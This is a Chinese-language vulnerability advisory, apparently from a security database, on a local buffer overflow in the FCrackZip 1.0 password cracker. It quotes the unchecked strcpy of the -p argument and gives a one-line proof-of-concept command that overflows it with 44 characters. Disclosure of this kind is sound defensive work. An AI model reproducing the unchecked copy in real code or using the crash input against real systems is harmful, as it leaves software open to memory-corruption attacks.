发布日期：2010-09-05
更新日期：2010-09-06

受影响系统：

Marc Lehmann FCrackZip 1.0

描述：

---

fcrackzip是部分使用汇编编写的口令破解程序。

FCrackZip在使用-p标记提供字典攻击所使用的初始口令或文件时没有检查输入长度，本地用户可以通过提供超过40个字符的超长字符串触发缓冲区溢出，导致拒绝服务的情况。以下是有漏洞的代码段：  

   ----------------------------  

            case 'p':  

        strcpy (pw, optarg);  

        break;  

   ----------------------------

<*来源：0x6264
  
  链接：http://www.exploit-db.com/exploits/14904/
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

$ ./fcrackzip -p $(python -c 'print "A"*44') file.zip

建议：

---

厂商补丁：

Marc Lehmann
------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://oldhome.schmorp.de/marc/fcrackzip.html

浏览次数：3157
严重程度：0（网友投票）